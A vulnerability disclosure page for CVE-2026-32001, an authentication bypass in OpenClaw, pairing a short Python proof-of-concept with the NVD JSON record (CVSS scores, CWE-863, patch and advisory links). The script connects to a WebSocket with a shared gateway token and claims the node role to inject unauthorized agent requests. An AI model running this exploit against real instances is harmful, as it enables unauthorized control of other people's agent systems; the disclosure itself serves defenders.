CVE-2026-32001

import asyncio import websockets # Conceptual PoC for CVE-2026-32001 # This script demonstrates how an attacker might claim the 'node' role # using a shared gateway token to inject unauthorized calls. async def exploit_vulnerability(uri, token): # Construct headers with the shared gateway token # Note: The vulnerability bypasses device identity verification extra_headers = { "Authorization": f"Bearer {token}" } try: async with websockets.connect(uri, extra_headers=extra_headers) as websocket: print("[+] Connected to OpenClaw WebSocket") # Attack Vector: Claim role=node during handshake/inital message # In a vulnerable implementation, the server accepts this without # verifying the device identity associated with the token. payload = { "role": "node", "action": "node.event", "params": { "type": "agent.request", # Triggering unauthorized agent request "data": "malicious_payload" } } await websocket.send(str(payload)) print("[+] Payload sent: role=node, node.event injected") response = await websocket.recv() print(f"[+] Server response: {response}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with target URI and a valid shared gateway token target_uri = "ws://target-openclaw-instance:8080/ws" shared_token = "YOUR_SHARED_GATEWAY_TOKEN_HERE" asyncio.run(exploit_vulnerability(target_uri, shared_token))

{"cve": {"id": "CVE-2026-32001", "sourceIdentifier": "[email protected]", "published": "2026-03-19T22:16:32.113", "lastModified": "2026-03-23T18:51:27.170", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 contain an authentication bypass vulnerability that allows clients authenticated with a shared gateway token to connect as role=node without device identity verification. Attackers can exploit this by claiming the node role during WebSocket handshake to inject unauthorized node.event calls, triggering agent.request and voice.transcript flows without proper device pairing."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a 2026.2.22 contienen una vulnerabilidad de omisión de autenticación que permite a los clientes autenticados con un token de pasarela compartido conectarse como role=node sin verificación de identidad del dispositivo. Los atacantes pueden explotar esto al reclamar el rol de nodo durante el handshake de WebSocket para inyectar llamadas no autorizadas a node.event, desencadenando flujos de agent.request y voice.transcript sin el emparejamiento adecuado del dispositivo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/ddcb2d79b17bf2a42c5037d8aeff1537a12b931e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rv2q-f2h5-6xmg", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-node-role-device-identity-bypass-via-websocket-authentication", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}